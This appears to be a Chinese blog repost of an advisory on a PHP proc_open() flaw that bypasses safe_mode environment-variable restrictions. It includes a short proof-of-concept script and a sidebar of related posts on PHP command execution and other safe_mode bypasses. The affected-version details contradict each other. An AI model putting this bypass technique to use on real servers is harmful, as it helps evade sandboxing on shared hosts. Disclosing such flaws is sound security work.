绕过php safe_mode,PHP proc_open()绕过safe_mode_protected_env_var限制漏洞

最新推荐文章于 2022-07-25 00:25:59 发布
最新推荐文章于 2022-07-25 00:25:59 发布
阅读量204 收藏
点赞数
文章标签: 绕过php safe_mode

受影响系统:

PHP PHP 5.3.x

不受影响系统:

PHP PHP 5.3.1

描述:

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP没有执行任何检查便允许传送对proc_open所指定的环境变量,这就忽略了safe_mode_allowed_env_vars和safe_mode_protected_env_vars设置。用户可以绕过safe_mode限制访问Apache UID可访问的任意文件。

测试方法: 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

putenv("BLAHBLAH=123");

putenv("LD_LIBRARY_PATH=/no/way");

putenv("PHP_TESTVAR=allowed");

$env = array(‘BLAHBLAH’ => ‘123’, ‘LD_LIBRARY_PATH’ => ‘/no/way’,

‘PHP_TESTVAR’ => ‘allowed’);

$dptspec = array(0 => array("pipe", "r"),

1 => array("pipe", "w"));

$fp = proc_open(‘env’, $dptspec, $pipes, ‘./’, $env);

echo "

";

while(!feof($pipes[1])) echo fgets($pipes[1], 1024);

fclose($pipes[1]);

echo "

";

?>

建议:

厂商补丁:

PHP

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

琉璃与大大
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ping_cap_set_proc报错分析.docx
07-03
Ping 命令报错分析 - cap_set_proc 错误解决方案 Linux 权限控制机制中, capability 是一种基于进程的权限控制机制,它可以将传统的基于用户的权限控制机制进行细粒度的控制。Capability 机制可以控制进程的某些...
PHP安全问题:远程溢出、DoS、safe_mode绕过漏洞.pdf
11-23
PHP安全问题:远程溢出、DoS、safe_mode绕过漏洞.pdf
PHP中命令执行的几种姿势总结(一)
csd_ct的专栏
11-07 3243
命令执行是web攻击中常用的手法之一,在PHP中,可调用以下函数来实现命令执行,如 1、exec() exec函数用的较少,主要是因为该函数默认返回值是执行结果的最后一行,并不会有全部的执行结果。如果要打印执行结果,需遍历打印output数组, 1.1 函数原型 string exec ( string command, array &output, int &return_var) //command参数是要执行的命令 //output数组是保存输出结果 //return_va
PHP代码审计----4、命令注入
七天
07-07 621
文章目录命令注入1、system()2、exec()函数3、shell_exec()函数4、passthru()函数5、``6、popen()函数8、pcntl_exec()函数防范方法 命令注入 PHP 执行系统命令可以使用以下几个函数:system()、exec()、shell_exec()、passthru()、“、popen()、proc_open()、pcntl_exec()等。 查找程序中程序中使用这些函数的地方,检查提交变量是否用户可控,有无做输入验证 1、system() 执行外部程序
php.ini procopen,“出于安全原因,已禁用proc_open()” – PHP错误
weixin_39794385的博客
04-11 866
proc_open() has been disabled for security reasons我现在正在免费托管(Hostinger) – 创建一个仅供我使用的个人网站和其他一些网站.我知道我应该从php.ini中删除proc_open,但由于我的共享主机方案,我无法访问它.我的代码中proc_open周围的代码如下 – 如果您需要完整代码,请告诉我.我试过评论部分,但它返回错误.我想要的只...
远程 命令/代码 执行(remote command/code execute)漏洞总结
未完成的歌~的博客
08-20 8127
这周来学习下命令执行漏洞;命令执行漏洞是用户通过浏览器在远程服务器上执行任意系统命令,与代码执行漏洞没有太大的区别,不过我们在学习时还是要区分不同的概念。关于代码执行漏洞会在下篇博客中详述。 一、什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popenproc_popen等,当用户能控制这些函数中的参数时...
web安全-命令执行漏洞
weixin_61956136的博客
07-25 1915
web安全-命令执行漏洞
ProC-Sample.rar_oracle_oracle proc sample_proc
09-20
标题中的"ProC-Sample.rar_oracle_oracle proc sample_proc"揭示了这是一个关于Oracle数据库的ProC编程示例。ProC是Oracle提供的一种预编译器,它允许开发者在PL/SQL中嵌入C代码,以提高性能和处理复杂计算。这个...
hello_proc.tar.gz_device_create_file_proc_hello
09-24
本主题将深入探讨如何利用proc文件系统创建一个设备文件,具体案例为"hello_proc.tar.gz_device_create_file_proc_hello"。 首先,`/proc`文件系统是一个虚拟文件系统,它并不存储在磁盘上,而是由内核动态生成的,...
Linux_kernel_proc.rar_linux memory proc
09-19
在Linux操作系统中,`/proc`目录是一个非常特殊且重要的虚拟文件系统,它提供了一种方式来查看和交互内核的状态。标题中的“Linux_kernel_proc.rar_linux memory proc”表明我们将探讨如何通过`/proc`来理解和分析...
flow_proc.rar_flow_proc
09-19
流水线结构是在逻辑很复杂的情况下使用,通过分栈,把一个复杂的逻辑分成若干个比较简单的块实现,减少信号的逻辑级,提高频率。最形象的实例就是位宽较大的加法器。 把一个复杂的逻辑分成若干个比较简单的块实现,...
PHP COM组件调用绕过安全模式执行任意文件漏洞
03-03
Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式下(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令。漏洞出现的原因是由于在安全模式下的PHP平台虽然system();pathru()函数被禁止,但是com。allow_dcom的设置依旧是为 true。以至于攻击者可以使用COM()函数创建系统组件对象来运行系统命令。如果是默认的Apache设置或者Web服务器以 Loacalsystem权限或Administrators权限运行,攻击者可以使用这个漏洞来提升权限。
php curl安全,PHP cURL 'safe mode'安全绕过漏洞
weixin_28665677的博客
03-20 959
BUGTRAQ ID: 27413CVE ID:CVE-2007-4850CNCVE ID:CNCVE-20074850PHP是一款流行的网络编程语言。PHP cURL存在'safe mode'安全绕过问题,远程攻击者可以利用漏洞访问受限制文件,获得敏感信息。var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__...
fopen php漏洞,PHP FOpen Safe_Mode限制绕过漏洞
weixin_30356603的博客
03-10 404
PHP是一款开放源代码的网络编程语言。PHP存在安全模式绕过问题,远程攻击者可以利用漏洞写文件到其他未授权位置,建立文件并执行。在PHP 5.2.0中可使用写模式绕过safe_mode,fopen()函数描述如下:- -845-845--- Code from PHP520 ext/standard/file.c [START]stream = php_stream_open_wrapper_ex...
整理一些PHP开发安全问题
hello_katty的专栏
07-06 9205
整理一些PHP开发安全问题   php给了开发者极大的灵活性,但是这也为安全问题带来了潜在的隐患,近期需要总结一下以往的问题,在这里借翻译一篇文章同时加上自己开发的一些感触总结一下。 简介   当开发一个互联网服务的时候,必须时刻牢记安全观念,并在开发的代码中体现。PHP脚本语言对安全问题并不关心,特别是对大多数没有经验的开发者来说。每当你讲任何涉及到钱
composer安装出现proc_open没有开启问题的解决方案
08-03 887
今天在安装下载项目的时候,使用composer来安装依赖。遇到了   The Process class relies on proc_open, which is not available on your PHP installation. 解决方法:   在php.ini中,找到disable_functions选项,看看后面是否有proc_open...
php中安全模式safe_mode配置教程--不理解,从未接触过
东垂小夫
05-17 1797
php的安全模式是个非常重要的内嵌的安全机制,能够控制一些php中的函数,比如system(),同时把很多文件操作函数进行了权限控制,也不允许对某些关键文件的文件。 (1) 打开php的安全模式   php的安全模式是个非常重要的内嵌的安全机制,能够控制一些php中的函数,比如system(),   同时把很多文件操作函数进行了权限控制,也不允许对某些关键文件的文件,比如/etc/p
mct_controller_handle_SOF_proc解析这个函数
最新发布
04-01
mct_controller_handle_SOF_proc函数是一个USB控制器的处理函数,用于处理USB控制器收到的SOF(Start of Frame)中断信号。 SOF是USB总线上的一个定时信号,每隔1ms发出一次。USB设备可以根据SOF信号来同步数据传输,保证数据的正确传输。当USB控制器收到SOF信号时,就会调用mct_controller_handle_SOF_proc函数来处理这个中断信号。 mct_controller_handle_SOF_proc函数的主要作用如下: 1. 检查USB控制器是否处于工作状态,如果没有,则返回错误码。 2. 检查当前USB带宽是否可用,如果可用,则将当前带宽状态设置为占用状态。 3. 检查是否有数据需要发送,如果有,则进行数据发送操作。 4. 检查是否有数据需要接收,如果有,则进行数据接收操作。 5. 更新USB控制器状态和传输统计信息,记录数据传输的状态和统计数据。 通过对mct_controller_handle_SOF_proc函数的解析,可以了解USB控制器的工作原理和数据传输的流程,对于USB设备的开发和调试具有重要意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值